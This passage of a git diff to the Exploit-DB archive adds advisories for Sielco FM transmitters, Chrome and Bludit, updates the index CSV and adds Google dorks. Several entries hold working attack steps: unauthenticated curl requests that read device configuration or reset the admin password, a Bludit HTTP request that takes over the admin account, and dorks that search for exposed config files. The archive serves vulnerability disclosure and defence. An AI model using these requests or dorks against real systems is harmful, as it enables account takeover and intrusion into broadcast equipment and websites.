(http://savannah.nongnu.org/projects/lwip) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2023-5766 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5766.php + + +26.01.2023 + +-- + + +$ curl -s http://RADIOFM/factory.ssi +$ curl -s http://RADIOFM/rds.ssi +$ curl -s http://RADIOFM/ip.ssi +$ curl -s http://RADIOFM/alarm.ssi +$ curl -s http://RADIOFM/i2s.ssi +$ curl -s http://RADIOFM/time.ssi +$ curl -s http://RADIOFM/fft.ssi +$ curl -s http://RADIOFM/info.ssi +$ curl -s http://RADIOFM/status.ssi +$ curl -s http://RADIOFM/statusx.ssi +$ curl -s http://RADIOFM/audio.ssi +$ curl -s http://RADIOFM/smtp.ssi +$ curl -s http://RADIOFM/rf.ssi +$ curl -s http://RADIOFM/rfa.ssi +$ curl -s http://RADIOFM/ping.ssi +$ curl -s http://RADIOFM/lan.ssi +$ curl -s http://RADIOFM/kappa.ssi +$ curl -s http://RADIOFM/dbrt.ssi +$ curl -s http://RADIOFM/audiom.ssi +$ curl -s http://RADIOFM/log.ssi \ No newline at end of file diff --git a/exploits/hardware/webapps/51371.txt b/exploits/hardware/webapps/51371.txt new file mode 100644 index 000000000..77f443866 --- /dev/null +++ b/exploits/hardware/webapps/51371.txt @@ -0,0 +1,54 @@ +## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP +## Exploit Author: LiquidWorm + + +Vendor: Sielco S.r.l +Product web page: https://www.sielco.org +Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 + PolyEco1000 CPU:1.9.4 FPGA:10.19 + PolyEco1000 CPU:1.9.3 FPGA:10.19 + PolyEco500 CPU:1.7.0 FPGA:10.16 + PolyEco300 CPU:2.0.2 FPGA:10.19 + PolyEco300 CPU:2.0.0 FPGA:10.19 + +Summary: PolyEco is the innovative family of high-end digital +FM transmitters of Sielco. They are especially suited as high +performance power system exciters or compact low-mid power +transmitters. The same cabinet may in fact be fitted with 50, +100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, +1000). + +All features can be controlled via the large touch-screen display +4.3" or remotely. Many advanced features are inside by default +in the basic version such as: stereo and RDS encoder, audio +change-over, remote-control via LAN and SNMP, "FFT" spectral +analysis of the audio sources, SFN synchronization and much more. + +Desc: The application suffers from an authentication bypass, +account takeover/lockout and elevation of privileges vulnerability +that can be triggered by directly calling the users object and +effectively modifying the password of the two constants user/role +(user/admin). This can be exploited by an unauthenticated adversary +by issuing a single POST request to the vulnerable endpoint and +gain unauthorized access to the affected device with administrative +privileges. + +Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2023-5765 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5765.php + + +26.01.2023 + +-- + + +# Change admin pwd +$ curl -X POST -F "pwd_admin=t00t" -F "pwd_user=" http://RADIOFM/protect/users.htm \ No newline at end of file diff --git a/exploits/macos/local/51361.txt b/exploits/macos/local/51361.txt new file mode 100644 index 000000000..c30ce70f0 --- /dev/null +++ b/exploits/macos/local/51361.txt @@ -0,0 +1,319 @@ +## Exploit Title: Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS) +## Exploit Author: LiquidWorm + +Vendor: Google LLC +Product web page: https://www.google.com +Affected version: 111.0.5563.64 (Official Build) (x86_64) + 110.0.5481.100 (Official Build) (x86_64) + 108.0.5359.124 (Official Build) (x86_64) + 108.0.5359.98 (Official Build) (x86_64) +Fixed version: 112.0.5615.49 (Official Build) (x86_64) + +Summary: Google Chrome browser is a free web browser used for +accessing the internet and running web-based applications. The +Google Chrome browser is based on the open source Chromium web +browser project. Google released Chrome in 2008 and issues several +updates a year. + +Desc: Fatal OOM/crash of Chrome browser while detaching/attaching +tabs on macOS. + +Commit fix: + +"The original cl landed many months ago, but +chrome/browser/ui/views/frame/browser_non_client_frame_view_mac.mm +is the only change that didn't revert cleanly." + +macOS a11y: Implement accessibilityHitTest for remote app shims (PWAs) + +Implements accessibility hit testing for RemoteCocoa so that Hover Text +and VoiceOver mouse mode can read the accessible objects under the +user's pointer. Cross-process plumbing was needed because RemoteCocoa +bridges to native controls in a separate app shim process and must +report accessibility trees from the browser process via the +undocumented NSAccessibilityRemoteUIElement mechanism. + +This CL does the following: + +1. Unblocks remote accessibilityHitTest by calling setRemoteUIApp:YES + in the browser process. This enables the browser process to accept + redirected accessibilityHitTest calls to the object corresponding to + any NSAccessibilityRemoteUIElement returned by the original + accessibilityHitTest at the app shim process. + +2. (For Browser UI) Overrides NativeWidgetMacNSWindowTitledFrame's + accessibilityHitTest to have a custom implementation with + NSAccessibilityRemoteUIElement support so that custom window + controls can be found. Additionally, adjusts the BrowserView bounds + so that AXPlatformNodeCocoa's accessibilityHitTest (which doesn't + support view targeting) can return controls in the web app frame + toolbar. + +3. (For Web Content) Implements RenderWidgetHostViewCocoa's + accessibilityHitTest for instances in the app shim to return a + NSAccessibilityRemoteUIElement corresponding to their counterparts + in the browser process so that web content objects can be found. + + +Tested on: macOS 12.6.1 (Monterey) + macOS 13.3.1 (Ventura) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5770 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5770.php + + +08.12.2022 + +-- + + +UI PoC: +------- +1. Grab a tab and detach it. +2. Bring back the tab. +3. Do this 2-3 times attaching / re-attaching the tab. +4. Chrome will hang (100% CPU) / Out-of-Memory (OOM) for 7-8 minutes. +5. Process crashes entirely. + +Ref: Issue 1400682 (Ticket created: Dec 13, 2022) +Ref: https://bugs.chromium.org/p/chromium/issues/detail?id=1400682 +Ref: https://chromium-review.googlesource.com/c/chromium/src/+/3861171 +Ref: axtester.mm terminal PoC by xi.ch...@gmail.com (https://bugs.chromium.org/u/161486905) + +============= +// +// Copyright (c) Microsoft Corporation. All rights reserved. +// + +#include + +#include +#include +#include + +__BEGIN_DECLS + // NOLINTNEXTLINE + AXError _AXUIElementGetWindow(AXUIElementRef, CGWindowID *); + // NOLINTNEXTLINE + CFTypeID AXTextMarkerGetTypeID(); +__END_DECLS + +std::ostream& bold_on(std::ostream& os) +{ + if (isatty(STDOUT_FILENO)) + { + return os << "\e[1m"; + } + return os; +} + +std::ostream& bold_off(std::ostream& os) +{ + if (isatty(STDOUT_FILENO)) + { + return os << "\e[0m"; + } + return os; +} + +std::string from_cfstr(CFTypeRef cf_ref) +{ + if (cf_ref != nullptr && CFGetTypeID(cf_ref) == CFStringGetTypeID()) + { + const auto cf_str = static_cast(cf_ref); + const auto max_length = static_cast(CFStringGetMaximumSizeForEncoding( + CFStringGetLength(cf_str), kCFStringEncodingUTF8)) + 1; + + auto result = std::string(max_length, '\0'); + if (CFStringGetCString(cf_str, result.data(), static_cast(max_length), kCFStringEncodingUTF8)) + { + if (const auto pos = result.find('\0'); pos != std::string::npos) + { + result.resize(pos); + } + return result; + } + } + return {}; +} + +std::string ax_element_id(AXUIElementRef value) +{ + // AX element cache - AX elements are backed by CFData + // (referring to 'remote' AX objects) and this data is + // 'stable' across 'volatile' instances of AXUIElement. + // 'hash and equality' of AX elements are based on this + // data and therefore, we can use AXUIElement objects as + // 'keys' in a dictionary with values, identifying these + // objects (uniquely). + const static auto ax_elements = CFDictionaryCreateMutable(kCFAllocatorDefault, 0, + &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks); + + auto ax_id = CFDictionaryGetValue(ax_elements, value); + + if (ax_id == nullptr) + { + if (const auto uuid = CFUUIDCreate(kCFAllocatorDefault)) + { + if (const auto uuid_s = CFUUIDCreateString(kCFAllocatorDefault, uuid)) + { + CFDictionarySetValue(ax_elements, value, uuid_s); + + CFRelease(uuid_s); + } + CFRelease(uuid); + } + + ax_id = CFDictionaryGetValue(ax_elements, value); + } + + return from_cfstr(ax_id); +} + +template +T ax_attribute_value(AXUIElementRef e, CFStringRef name) +{ + if (e != nullptr) + { + auto ref = T{}; + if (AXUIElementCopyAttributeValue(e, name, (CFTypeRef *) &ref) == kAXErrorSuccess) + { + return ref; + } + } + return nullptr; +} + +// NOLINTNEXTLINE +void ax_traverse(AXUIElementRef elem, uint32_t depth) +{ + const auto max_depth = 10; + if (depth > max_depth) + { + return; + } + + const auto indent = [&]() + { + for (auto x = 0; x < depth; x++) + { + std::cout << " "; + } + }; + + auto wid = CGWindowID{}; + if (_AXUIElementGetWindow(elem, &wid) != kAXErrorSuccess) + { + wid = 0; + } + + indent(); + const auto role = ax_attribute_value(elem, kAXRoleAttribute); + + std::cout << bold_on << "[*** DEPTH: " << depth << ", ROLE: " << from_cfstr(role) << + ", ID: " << ax_element_id(elem) << ", WINDOW: " << wid << " ***]" << bold_off << + std::endl; + + if (const auto children = ax_attribute_value(elem, kAXChildrenAttribute)) + { + for (CFIndex idx = 0; idx < CFArrayGetCount(children); idx++) + { + const auto element = static_cast(CFArrayGetValueAtIndex(children, idx)); + ax_traverse(element, depth + 1); + } + CFRelease(children); + } +} + +int main(int argc, char* const argv[]) +{ + auto pid = 0; + + if (argc > 1) + { + if (!AXIsProcessTrusted()) + { + std::cerr << "Please 'AX approve' Terminal in System Preferences" << std::endl; + exit(1); // NOLINT + } + // NOLINTNEXTLINE + pid = std::stoi(argv[1]); + } + else + { + std::cerr << "usage: axtester " << std::endl; + exit(1); // NOLINT + } + + if (const auto app = AXUIElementCreateApplication(pid)) + { + auto observer = AXObserverRef{}; + auto ret = AXObserverCreate(pid, [](auto /*unused*/, AXUIElementRef /*unused*/, CFStringRef name, auto ctx) + { + auto myapp = (__AXUIElement*)(ctx); + auto hint = CFStringGetCStringPtr(name,kCFStringEncodingUTF8); + std::cout << "Hint: " << hint << std::endl; + ax_traverse(myapp, 0); + }, &observer); + + if (kAXErrorSuccess != ret) + { + std::cerr << "Fail to create observer" << std::endl; + return -1; + } + + std::cout << "title:" << AXObserverAddNotification(observer, app, kAXTitleChangedNotification, (void*)app) << std::endl; + std::cout << "focus_window:" << AXObserverAddNotification(observer, app, kAXFocusedWindowChangedNotification, (void*)app) << std::endl; + std::cout << "focus_element:" << AXObserverAddNotification(observer, app, kAXFocusedUIElementChangedNotification, (void*)app) << std::endl; + std::cout << "move:" << AXObserverAddNotification(observer, app, kAXWindowMovedNotification, (void*)app) << std::endl; + std::cout << "resize:" << AXObserverAddNotification(observer, app, kAXWindowResizedNotification, (void*)app) << std::endl; + std::cout << "deminiaturized:" << AXObserverAddNotification(observer, app, kAXWindowDeminiaturizedNotification, (void*)app) << std::endl; + std::cout << "miniaturize:" << AXObserverAddNotification(observer, app, kAXWindowMiniaturizedNotification, (void*)app) << std::endl; + CFRunLoopAddSource(CFRunLoopGetCurrent(), AXObserverGetRunLoopSource(observer), kCFRunLoopDefaultMode); + CFRunLoopRun(); + } + + return 0; +} + +--codeaibot explains-- + +This is a C++ program that uses the Accessibility API (AX) provided +by macOS to traverse the user interface of a running application and +print out information about the accessibility elements that it finds. + +The program takes a single argument, which is the process ID (PID) of +the application to examine. If no argument is provided, the program +displays a usage message and exits. + +The main() function first checks if the Terminal app has been granted +accessibility privileges by calling the AXIsProcessTrusted() function. +If it hasn't, the program displays an error message and exits. + +If the Terminal app has been granted accessibility privileges, the program +creates an AXUIElementRef object for the application using the AXUIElementCreateApplication() +function, passing in the PID as an argument. + +The ax_traverse() function is then called with the root accessibility +element of the application as an argument. This function recursively +traverses the accessibility tree of the application, printing out +information about each element it encounters. + +The program also defines several helper functions for working with Core +Foundation types (from_cfstr(), ax_element_id(), and ax_attribute_value()), +as well as some functions for printing formatted output to the console +(bold_on() and bold_off()). + +-- / -- + +As this issue is not a security issue nor results in security consequences, +this report is not eligible for a VRP reward. + +++ +Thank you Amy! +-- \ No newline at end of file diff --git a/exploits/php/webapps/51360.txt b/exploits/php/webapps/51360.txt new file mode 100644 index 000000000..7cedabf2e --- /dev/null +++ b/exploits/php/webapps/51360.txt @@ -0,0 +1,90 @@ +## Exploit Title: Bludit 4.0.0-rc-2 - Account takeover +## Author: nu11secur1ty +## Date: 04.11.2013 +## Vendor: https://www.bludit.com/ +## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2 +## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/ +## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit + +## Description: +The already authenticated attacker can send a normal request to change +his password and then he can use +the same JSON `object` and the vulnerable `API token KEY` in the same +request to change the admin account password. +Then he can access the admin account and he can do very malicious stuff. + +STATUS: HIGH Vulnerability + +[+]Exploit: +```PUT +PUT /api/users/admin HTTP/1.1 +Host: 127.0.0.1:8000 +Content-Length: 138 +sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112" +sec-ch-ua-platform: "Windows" +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 +Safari/537.36 +content-type: application/json +Accept: */* +Origin: http://127.0.0.1:8000 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://127.0.0.1:8000/admin/edit-user/pwned +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui +Connection: close + +{"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"} + +``` + +[+]Response: +```HTTP +HTTP/1.1 200 OK +Host: 127.0.0.1:8000 +Date: Tue, 11 Apr 2023 08:33:51 GMT +Connection: close +X-Powered-By: PHP/7.4.30 +Access-Control-Allow-Origin: * +Content-Type: application/json + +{"status":"0","message":"User edited.","data":{"key":"admin"}} +``` + + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2) + +## Proof and Exploit: +[href](https://streamable.com/w3aa4d) + +## Time spend: +00:57:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and +https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/windows/dos/51348.txt b/exploits/windows/dos/51348.txt deleted file mode 100644 index 491938dcd..000000000 --- a/exploits/windows/dos/51348.txt +++ /dev/null @@ -1,38 +0,0 @@ -# Exploit Title: Microsoft Windows 11 - 'cmd.exe' Denial of Service -# Exploit Author: Milad Karimi (Ex3ptionaL) -# Date: 2023-03-30 -# Vendor Homepage: https://www.microsoft.com/en-us -# Software Link: https://www.microsoft.com/en-us -# Tested Version: N/A -# Tested on OS: Windows 11 Pro - -# [ About App ] - -Microsoft Windows is prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. - -An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Arbitrary code execution may be possible, but this has not been confirmed. - -This issue affects Microsoft Windows 11 Pro. - -Note: Further analysis reveals that this is not a vulnerability; this BID is now retired. - - -# [ POC ] - -# 1.Run the python script, it will create a new file "PoC.txt" -# 2.Run Command Prompt -# 3.Copy the content of the file "PoC.txt" -# 4.Paste the content of dos.txt into the lin cmd.exe -# 5.Crashed ;) - -#!/usr/bin/env python -buffer = "A" * 339839907 -payload = buffer -try: -    f=open("PoC.txt","w") -    print "[+] Creating %s evil payload.." %len(payload) -    f.write(payload) -    f.close() -    print "[+] File created!" -except: -    print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f788a75a3..3ff01acf6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -1123,6 +1123,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 28989,exploits/asp/webapps/28989.txt,"INFINICART - 'search.asp?search' Cross-Site Scripting",2006-11-13,"laurent gaffie",webapps,asp,,2006-11-13,2013-10-16,1,CVE-2006-5958;OSVDB-30380,,,,,https://www.securityfocus.com/bid/21043/info 28990,exploits/asp/webapps/28990.txt,"INFINICART - 'sendpassword.asp?email' Cross-Site Scripting",2006-11-13,"laurent gaffie",webapps,asp,,2006-11-13,2013-10-16,1,CVE-2006-5958;OSVDB-30381,,,,,https://www.securityfocus.com/bid/21043/info 11414,exploits/asp/webapps/11414.txt,"Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities",2010-02-12,SpeeDr00t,webapps,asp,,2010-02-11,,0,OSVDB-62338,,,,, +51362,exploits/asp/webapps/51362.txt,"InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal",2023-04-14,Zer0FauLT,webapps,asp,,2023-04-14,2023-04-14,0,,,,,, 29456,exploits/asp/webapps/29456.txt,"InstantASP 4.1 - 'Logon.aspx?sessionid' Cross-Site Scripting",2007-01-15,Doz,webapps,asp,,2007-01-15,2013-11-06,1,CVE-2007-0302;OSVDB-32852,,,,,https://www.securityfocus.com/bid/22052/info 29457,exploits/asp/webapps/29457.txt,"InstantASP 4.1 - 'Members1.aspx' Multiple Cross-Site Scripting Vulnerabilities",2007-01-15,Doz,webapps,asp,,2007-01-15,2013-11-06,1,CVE-2007-0302;OSVDB-32853,,,,,https://www.securityfocus.com/bid/22052/info 30963,exploits/asp/webapps/30963.txt,"InstantSoftwares Dating Site - Login SQL Injection",2007-12-31,"Aria-Security Team",webapps,asp,,2007-12-31,2014-01-15,1,CVE-2007-6671;OSVDB-39766,,,,,https://www.securityfocus.com/bid/27080/info @@ -3863,6 +3864,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 23317,exploits/hardware/remote/23317.txt,"Seyeon FlexWATCH Network Video Server 2.2 - Unauthorized Administrative Access",2003-10-31,slaizer,remote,hardware,,2003-10-31,2012-12-12,1,CVE-2003-1160;OSVDB-2842,,,,,https://www.securityfocus.com/bid/8942/info 35995,exploits/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem/Router 915 WM - Remote DNS Change",2015-02-05,"Todor Donev",remote,hardware,,2015-02-05,2017-09-08,0,OSVDB-118005,,,,, 40867,exploits/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",remote,hardware,,2016-12-05,2016-12-05,0,,,,,, +51366,exploits/hardware/remote/51366.txt,"Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation",2023-04-14,LiquidWorm,remote,hardware,,2023-04-14,2023-04-14,0,,,,,, 7858,exploits/hardware/remote/7858.php,"Siemens ADSL SL2-141 - Cross-Site Request Forgery",2009-01-25,spdr,remote,hardware,,2009-01-24,,1,,,,,, 24065,exploits/hardware/remote/24065.java,"Siemens S55 - Cellular Telephone Sms Confirmation Message Bypass",2004-04-27,FtR,remote,hardware,,2004-04-27,2013-01-13,1,CVE-2004-2626;OSVDB-5703,,,,,https://www.securityfocus.com/bid/10227/info 38964,exploits/hardware/remote/38964.rb,"Siemens Simatic S7 1200 - CPU Command Module (Metasploit)",2015-12-14,"Nguyen Manh Hung",remote,hardware,102,2015-12-14,2015-12-14,0,,"Metasploit Framework (MSF)",,,, @@ -4716,6 +4718,14 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 25968,exploits/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",webapps,hardware,,2013-06-05,2016-12-05,0,OSVDB-94103,,,,, 44879,exploits/hardware/webapps/44879.md,"Siaberry 1.2.2 - Command Injection",2018-06-11,"Space Duck",webapps,hardware,,2018-06-12,2018-06-12,0,,,,,,https://blog.spaceduck.io/siaberry-1/ 48646,exploits/hardware/webapps/48646.py,"Sickbeard 0.1 - Remote Command Injection",2020-07-07,bdrake,webapps,hardware,,2020-07-07,2020-07-07,0,,,,,, +51363,exploits/hardware/webapps/51363.txt,"Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,, +51364,exploits/hardware/webapps/51364.txt,"Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,, +51365,exploits/hardware/webapps/51365.txt,"Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,, +51371,exploits/hardware/webapps/51371.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,, +51367,exploits/hardware/webapps/51367.py,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,, +51368,exploits/hardware/webapps/51368.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,, +51369,exploits/hardware/webapps/51369.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,, +51370,exploits/hardware/webapps/51370.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,, 25416,exploits/hardware/webapps/25416.txt,"SimpleTransfer 2.2.1 - Command Injection",2013-05-13,Vulnerability-Lab,webapps,hardware,,2013-05-13,2013-05-13,0,OSVDB-93263,,,,,https://www.vulnerability-lab.com/get_content.php?id=937 49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS)",2021-04-23,LiquidWorm,webapps,hardware,,2021-04-23,2021-10-28,0,,,,,, 49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",2021-04-23,LiquidWorm,webapps,hardware,,2021-04-23,2021-04-23,0,,,,,, @@ -9099,6 +9109,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 45107,exploits/macos/local/45107.txt,"Charles Proxy 4.2 - Local Privilege Escalation",2018-07-30,"Mark Wadham",local,macos,,2018-07-30,2018-07-30,0,CVE-2017-15358,Local,,,,https://m4.rkw.io/blog/cve201715358-local-root-privesc-in-charles-proxy-42.html 46724,exploits/macos/local/46724.txt,"Evernote 7.9 - Code Execution via Path Traversal",2019-04-18,"Dhiraj Mishra",local,macos,,2019-04-18,2019-04-18,0,CVE-2019-10038,Traversal,,,,https://www.inputzero.io/2019/04/evernote-cve-2019-10038.html 50696,exploits/macos/local/50696.py,"Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)",2022-02-02,LiquidWorm,local,macos,,2022-02-02,2022-02-02,0,,,,,, +51361,exploits/macos/local/51361.txt,"Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)",2023-04-14,LiquidWorm,local,macos,,2023-04-14,2023-04-14,0,,,,,, 44307,exploits/macos/local/44307.m,"Google Software Updater macOS - Unsafe use of Distributed Objects Privilege Escalation",2018-03-20,"Google Security Research",local,macos,,2018-03-20,2018-03-20,1,CVE-2018-6084,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1486 43224,exploits/macos/local/43224.sh,"Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,,2017-12-06,2017-12-06,1,CVE-2017-11741,Local,,,,https://m4.rkw.io/blog/cve201711741-local-root-privesc-in-hashicorp-vagrantvmwarefusion--4023.html 43223,exploits/macos/local/43223.sh,"Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,,2017-12-06,2017-12-06,1,CVE-2017-12579,Local,,,,https://m4.rkw.io/blog/cve201712579-local-root-privesc-in-hashicorp-vagrantvmwarefusion-4024.html @@ -14836,6 +14847,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,,2020-06-09,2020-06-09,0,CVE-2019-16113,,,,, 48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,,2020-10-23,2020-11-13,1,CVE-2019-17240,,,,, 49037,exploits/php/webapps/49037.rb,"Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)",2020-11-13,Aporlorxl23,webapps,php,,2020-11-13,2020-11-13,1,,,,,, +51360,exploits/php/webapps/51360.txt,"Bludit 4.0.0-rc-2 - Account takeover",2023-04-14,nu11secur1ty,webapps,php,,2023-04-14,2023-04-14,0,,,,,, 46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-1000811,,,,http://www.exploit-db.combludit-3.0.0.zip, 11360,exploits/php/webapps/11360.txt,"Blue Dove - SQL Injection",2010-02-08,HackXBack,webapps,php,,2010-02-07,,0,,,,,, 7797,exploits/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Blind SQL Injection",2009-01-15,darkjoker,webapps,php,,2009-01-14,2017-01-17,1,OSVDB-51769;CVE-2009-0425,,,,, @@ -37231,7 +37243,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42997,exploits/windows/dos/42997.txt,"Microsoft Windows 10 - WLDP/MSHTML CLSID UMCI Bypass",2017-10-17,"Google Security Research",dos,windows,,2017-10-17,2017-10-17,1,CVE-2017-11823,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1328 47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,,2019-12-20,2019-12-20,0,,,,,, 42007,exploits/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure",2017-05-15,"Google Security Research",dos,windows,,2017-05-15,2017-05-15,1,CVE-2017-0259,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1161 -51348,exploits/windows/dos/51348.txt,"Microsoft Windows 11 - 'cmd.exe' Denial of Service",2023-04-08,"Milad karimi",dos,windows,,2023-04-08,2023-04-08,0,,,,,, 20437,exploits/windows/dos/20437.c,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1)",1997-07-05,_eci,dos,windows,,1997-07-05,2012-08-11,1,"CVE-1999-0153 ;OSVDB-1666",,,,,https://www.securityfocus.com/bid/2010/info 20438,exploits/windows/dos/20438.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info 20439,exploits/windows/dos/20439.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info diff --git a/ghdb.xml b/ghdb.xml index b68150a2d..df6ccf7b6 100644 --- a/ghdb.xml +++ b/ghdb.xml @@ -37156,6 +37156,22 @@ Google+ https://plus.google.com/u/0/114827336297709201563 2021-10-18 Roshdy Essam + + 8153 + https://www.exploit-db.com/ghdb/8153 + Files Containing Juicy Info + Google Dork: intitle:"index of" "properties.json" + # Google Dork: intitle:"index of" "properties.json" +# Files Containing Juicy Info +# Date: 13/04/2023 +# Exploit Author: Arnob Biswas + + intitle:"index of" "properties.json" + https://www.google.com/search?q=intitle:"index of" "properties.json" + + 2023-04-14 + Arnob Biswas + 7303 https://www.exploit-db.com/ghdb/7303 @@ -40429,6 +40445,21 @@ Category: Files Containing Juicy Info 2022-09-19 HackerFrenzy + + 8155 + https://www.exploit-db.com/ghdb/8155 + Files Containing Juicy Info + intitle:"index of " "config/db" + # Google Dork: intitle:"index of" "properties.json" +# Files Containing Juicy Info +# Date: 13/04/2023 +# Exploit Author: Jerr279 + intitle:"index of " "config/db" + https://www.google.com/search?q=intitle:"index of " "config/db" + + 2023-04-14 + Jerr279 + 8132 https://www.exploit-db.com/ghdb/8132 @@ 